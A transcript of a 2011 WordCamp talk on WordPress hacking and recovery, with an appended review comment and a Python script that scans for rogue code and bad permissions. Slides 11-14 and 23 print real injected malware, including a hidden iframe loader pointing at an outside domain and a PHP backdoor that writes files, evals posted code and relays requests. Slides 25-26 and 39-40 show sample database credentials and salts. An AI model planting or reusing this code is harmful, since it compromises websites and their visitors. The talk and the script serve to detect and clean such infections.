Security: The Great WordPress Lockdown - WordCamp Melbourne - February 2011

The Great WordPress Lockdown presentation at WordCamp Melbourne February 2011.

  1. The Great WordPress Lockdown http://johnford.is/ @iamjohnford
  2. OMG, my site’s been hacked.
  3. “Help! Spams are eating my site!”
  4. “Help! Spams are eating my site!”
  5. “Did ninjas do it?”
  6. http://flic.kr/p/5AU3Lp
  7. Smoking Asthmatic Clowns
  8. S.A.C.s
  9. Why do S.A.C.s exist?
  10. What they do...
  11. document.write(unescape(%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%62%6C%34%63%6B%73%74%34%72%2E%63%6E%2F%62%6C%6F%67%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%31%37%27%20%77%69%64%74%68%3D%27%30%27%20%68%65%69%67%68%74%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E));
  12. <iframe src=http://bl4ckst4r.cn/blog/go.php?sid=17 width=0 height=0></iframe>
  13. <?php eval(base64_decode("Pz48P3BocA0KJGRlbGltID0gIiAgICAgIjsgZWNobyAkZGVsaW07IGVycm9yX3JlcG9ydGluZyhFX0FMTCk7IGlmKCFlbXB0...
  14. <?php$delim = " "; echo $delim; error_reporting(E_ALL); if(!empty($_POST[data])){ $post[data] = $_POST[data]; if(!empty($_POST[url])) { $tmp = base64_decode($_POST[url]); $urls_array = unserialize($tmp); $url = array_shift($urls_array);if(!empty($urls_array) AND count($urls_array)>0) { $tmp = serialize($urls_array);$post[url] = base64_encode($tmp); } $tmp = parse_url($url); if($tmp[scheme]=="ftp") { echo "trying to update file[ ".$tmp[path]." ] via FTPn"; $file =tmp.php; $content = unserialize(base64_decode($post[data])); $content =base64_decode($content[content]); $fp = fopen($file, w); fwrite($fp,$content); fclose($fp); chmod($file, 0777); $fp = fopen($file,r); $post =false; } else { echo "Sending request to: $url n"; $fp = false; } $content =request($url, $post, $fp); if($tmp[scheme]=="ftp") { fclose($fp); unlink($file); } if($tmp[scheme]=="ftp" AND $content!==false) echo "FTP: UPDATEDn";else echo $delim.$content; } else { $tmp = base64_decode($post[data]); $data =unserialize($tmp); if(empty($data) OR !is_array($data)) { exit("Some error whilesaving;"); } foreach ($data AS $d) { if(dirname($d[n])!=. and !file_exists(dirname($d[n]))) { mkdir(dirname($d[n]), 0777); chmod(dirname($d[n]),0777); } if($d[n]==ev) { eval($d[c]); continue; } $f = fopen($d[n], w);$bytes_written = fwrite($f, $d[c]); fclose($f); if(filesize($d[n])>10) { echo"file:".$d[n].": savedn"; } else { echo "some error happens: ".$d[n]." sizeis: ".filesize($d[n])." 
bytesn"; } if(!@chmod($d[n], 0777)) { echo "someerror with: ".$d[n]."n"; } } } } else { die("NO DATA"); } function request($url, $post=false, $fp=false, $timeout=150){ $ch = curl_init(); if($post) { $post= is_array($post)?http_build_query($post):$post; curl_setopt($ch, CURLOPT_POST,1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } if($fp) { curl_setopt($ch,CURLOPT_UPLOAD, 1); curl_setopt($ch, CURLOPT_INFILE, $fp); fclose($fp); }curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $content = curl_exec($ch); $error =curl_error($ch); if($error) { echo "CURL_ERROR: ".$error."n"; return false; }
  15. I don’t really give a $#%*.
  16. How did my site get S.A.C.ed?
  17. Guess your password
  18. I saw John Ford speak at WordCamp Melbourne 2011
  19. I saw John Ford speak at WordCamp Melbourne 2011: IsJFs@WCM2k11
  20. I saw the awesome, loving, generous, compassionate, handsome, courteous, thoughtful, modest John Ford speak at WordCamp Melbourne 2011: IstalgchctmJFs@WCM2k11
  21. Exploit old versions of WordPress
  22. Exploit vulnerable themes and plugins
  23. eval(gzuncompress(base64_decode(eJzcvdtyHMmSIPYOs/6H7Jo+XcCZQt2vBEEuCALdnOZNAMiesyQHlpUZVZVEVmadzCyA4PQxW0kmjcxkMj2tnvaxz2...
  24. File permissions http://codex.wordpress.org/Changing_File_Permissions
  25. // ** MySQL settings - You can get this info from your web host ** //
      /** The name of the database for WordPress */
      define('DB_NAME', 'wcnyc2010');
      /** MySQL database username */
      define('DB_USER', 'wcnyc2010');
      /** MySQL database password */
      define('DB_PASSWORD', '3^?wb6mhqsiyk^ABHR6y');
      /** MySQL hostname */
      define('DB_HOST', 'mysql.myserver.com');
      /** Database Charset to use in creating database tables. */
      define('DB_CHARSET', 'utf8');
      /** The Database Collate type. Don't change this if in doubt. */
      define('DB_COLLATE', '');
  26. /**#@+
       * Authentication Unique Keys and Salts.
       *
       * Change these to different unique phrases!
       * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
       * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
       *
       * @since 2.6.0
       */
      define('AUTH_KEY',         '2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y');
      define('SECURE_AUTH_KEY',  '*E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q)');
      define('LOGGED_IN_KEY',    '&psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4=');
      define('NONCE_KEY',        'x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4}');
      define('AUTH_SALT',        'eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi');
      define('SECURE_AUTH_SALT', '/a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65');
      define('LOGGED_IN_SALT',   'IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-');
      define('NONCE_SALT',       'hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W');
  27. http://wiki.mediatemple.net/w/File_Permissions
  28. http://wiki.mediatemple.net/w/File_Permissions
  29. Obscurity
  30. Cross tool exploits
  31. Multiple sites on the same server
  32. Use a different database user/pass for each site
  33. Hardening WordPress http://codex.wordpress.org/Hardening_WordPress
  34. “What do I do?”
  35. Contact your host
  36. Back up your exploited site
  37. FAQ: My site was hacked http://codex.wordpress.org/FAQ_My_site_was_hacked
  38. Change all passwords and keys
  39. // ** MySQL settings - You can get this info from your web host ** //
      /** The name of the database for WordPress */
      define('DB_NAME', 'wordcamp');
      /** MySQL database username */
      define('DB_USER', 'wordcamp');
      /** MySQL database password */
      define('DB_PASSWORD', '3^?wb6mhqsiyk^ABHR6y');
      /** MySQL hostname */
      define('DB_HOST', 'mysql.myserver.com');
      /** Database Charset to use in creating database tables. */
      define('DB_CHARSET', 'utf8');
      /** The Database Collate type. Don't change this if in doubt. */
      define('DB_COLLATE', '');
  40. /**#@+
       * Authentication Unique Keys and Salts.
       *
       * Change these to different unique phrases!
       * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
       * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
       *
       * @since 2.6.0
       */
      define('AUTH_KEY',         '2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y');
      define('SECURE_AUTH_KEY',  '*E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q)');
      define('LOGGED_IN_KEY',    '&psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4=');
      define('NONCE_KEY',        'x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4}');
      define('AUTH_SALT',        'eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi');
      define('SECURE_AUTH_SALT', '/a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65');
      define('LOGGED_IN_SALT',   'IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-');
      define('NONCE_SALT',       'hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W');
  41. Remove rogue code
  42. http://wordpress.org/extend/plugins/exploit-scanner/
  43. Subversion http://codex.wordpress.org/Installing/Updating_WordPress_with_Subversion
  44. machine:www user$ svn status
      ?       wp-config.php
      ?       .htaccess
      M       index.php
      ?       wp-content/cache
      X       wp-content/plugins/akismet
      M       wp-content/themes/twentyten/404.php
      ?       wp-admin/meta
      Performing status on external item at wp-content/plugins/akismet
  45. machine:www user$ svn diff wp-content/themes/twentyten/404.phpIndex: wp-content/themes/twentyten/404.php===================================================================--- wp-content/themes/twentyten/404.php (revision 15819)+++ wp-content/themes/twentyten/404.php (working copy)@@ -1,3 +1,5 @@+<?php echo "<h1>Heres some code that really shouldnt be here</h1>"; ?>+ <?php /** * The template for displaying 404 pages (Not Found).
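      Review bot: the injected `+<?php echo "<h1>Heres some code that really shouldnt be here</h1>"; ?>` line sits above the template's own `<?php` opening, so the working copy of 404.php runs it on every Not Found response; since the hunk shows nothing else in the file changed, restore the file to its revision 15819 content rather than editing around the line. Note that `svn diff` only surfaces this because the theme is under version control: the `?` (unversioned) entries in the slide 44 `svn status` output, such as wp-content/cache and wp-admin/meta, never appear in a diff and have to be inspected by hand.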
  46. Check file permissions
  47. Restore from backup
  48. YOU HAZ BACKUP, RIGHT? http://flic.kr/p/DC3Q
  49. http://flic.kr/p/5AU3Lp
  50. Thank you! http://johnford.is/ @iamjohnford
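As an added example (not code from the talk, nor from the exploit-scanner plugin linked on slide 42), the following Python script does two of the "What do I do?" checks in one walk of a WordPress tree: it flags files carrying the obfuscation patterns shown on slides 11-14 and 23 (eval(base64_decode(...)), eval(gzuncompress(base64_decode(...))), document.write(unescape(...)) and zero-size iframes) for the "Remove rogue code" step on slide 41, and it reports permissions that depart from the directories 755 / files 644 rule behind slides 24 and 46. The regexes, the 0600 expectation for wp-config.php, the placeholder iframe domain and the sample site it builds in a temporary directory are all this example's own assumptions.

```python
"""Added example, not code from the talk or the exploit-scanner plugin: walk a
WordPress tree and report rogue-code signatures and permission problems."""
import os
import re
import stat
import tempfile

# Signatures for the injection styles in the talk's samples. The regexes are
# this example's own choices, not the exploit-scanner plugin's rules.
SIGNATURES = {
    # slides 13 and 23: eval(base64_decode(...)), eval(gzuncompress(base64_decode(...)))
    "eval_of_decoded_payload": re.compile(
        r"eval\s*\((?:\s*\w+\s*\()*\s*base64_decode\s*\(", re.I),
    # slide 11: document.write(unescape(%3C%69...)) that hides an <iframe>
    "js_unescape_write": re.compile(
        r"document\.write\s*\(\s*unescape\s*\(\s*['\"]?(?:%[0-9a-f]{2}){8,}", re.I),
    # slide 12: zero-size iframe loading a remote page
    "hidden_iframe": re.compile(
        r"<iframe[^>]*\b(?:width|height)\s*=\s*['\"]?0\b[^>]*>", re.I),
}
LONG_BASE64 = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")  # blob worth a look even without eval
SCAN_EXTENSIONS = (".php", ".js", ".html", ".htm")
CONFIG_NAME = "wp-config.php"


def rogue_code_hits(path):
    """Signature names matching the file's content (empty list when clean)."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    hits = [name for name, rx in SIGNATURES.items() if rx.search(text)]
    if path.endswith(".php") and LONG_BASE64.search(text):
        hits.append("long_base64_blob")
    return hits


def permission_problems(path, name, is_dir):
    """Departures from dirs 755 / files 644; wp-config.php unreadable to others
    (the 0600 expectation for wp-config.php is this example's assumption)."""
    mode = stat.S_IMODE(os.lstat(path).st_mode)
    problems = []
    if mode & stat.S_IWOTH:
        problems.append("world-writable")           # what chmod 0777 on slide 14 leaves behind
    if not is_dir and mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        problems.append("executable file")          # PHP never needs the x bit
    if name == CONFIG_NAME and mode & (stat.S_IRGRP | stat.S_IROTH):
        problems.append("readable by group/other")  # DB password exposed to other accounts
    return [(p, oct(mode)) for p in problems]


def audit(root):
    """Map relative path -> list of findings for everything under root."""
    findings = {}
    for dirpath, dirs, files in os.walk(root):
        for name, is_dir in [(d, True) for d in dirs] + [(f, False) for f in files]:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # a symlink's own mode is meaningless; check the target separately
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            found = [f"{p} ({m})" for p, m in permission_problems(full, name, is_dir)]
            if not is_dir and name.lower().endswith(SCAN_EXTENSIONS):
                found += rogue_code_hits(full)
            if found:
                findings[rel] = found
    return findings


def build_sample_site():
    """Constructed fixture: a small install with one clean theme file and a few
    infected ones modelled on the slide samples (shortened, never executed)."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    files = {  # relative path -> (content, mode)
        "wp-config.php": ("<?php define('DB_NAME', 'example');\n", 0o644),
        "wp-content/themes/twentyten/404.php": (
            "<?php\n/**\n * The template for displaying 404 pages (Not Found).\n */\nget_header();\n", 0o644),
        # slide 13 style, blob prefix copied from the slide and cut short
        "wp-content/themes/twentyten/footer.php": (
            '<?php eval(base64_decode("Pz48P3BocA0KJGRlbGltID0gIiAgICAgIjs")); ?>\n', 0o644),
        # slide 23 style plus a long constructed blob (the A's are padding, not payload)
        "wp-content/plugins/akismet/akismet.php": (
            '<?php eval(gzuncompress(base64_decode("eJzcvdtyHMmSIPYOs' + "A" * 220 + '"))); ?>\n', 0o644),
        # slides 11-12 style; the iframe target is a placeholder, not the slide's domain
        "index.php": (
            "<?php get_header(); ?>\n"
            "<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D'));</script>\n"
            "<iframe src=http://example.invalid/go.php width=0 height=0></iframe>\n", 0o644),
        "wp-content/uploads/tmp.php": ("<?php // dropped by the slide-14 script\n", 0o777),
    }
    for rel, (content, mode) in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(content)
        os.chmod(full, mode)
    for rel in ("wp-content", "wp-content/themes", "wp-content/themes/twentyten",
                "wp-content/plugins", "wp-content/plugins/akismet"):
        os.chmod(os.path.join(root, rel), 0o755)  # pin modes so the audit does not depend on umask
    os.chmod(os.path.join(root, "wp-content/uploads"), 0o777)
    return root


if __name__ == "__main__":
    for path, found in sorted(audit(build_sample_site()).items()):
        print(f"{path}: {', '.join(found)}")
```

The output is a shortlist, not a verdict: minified assets and legitimate data URIs also contain long base64 runs, so every hit still needs a comparison against a pristine copy, which is exactly what the svn diff on slide 45 provides for versioned files. Likewise a world-writable wp-content/uploads is usually the leftover of someone working around an ownership problem; the fix is to have the directory owned by the account the web server runs as, not 0777.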
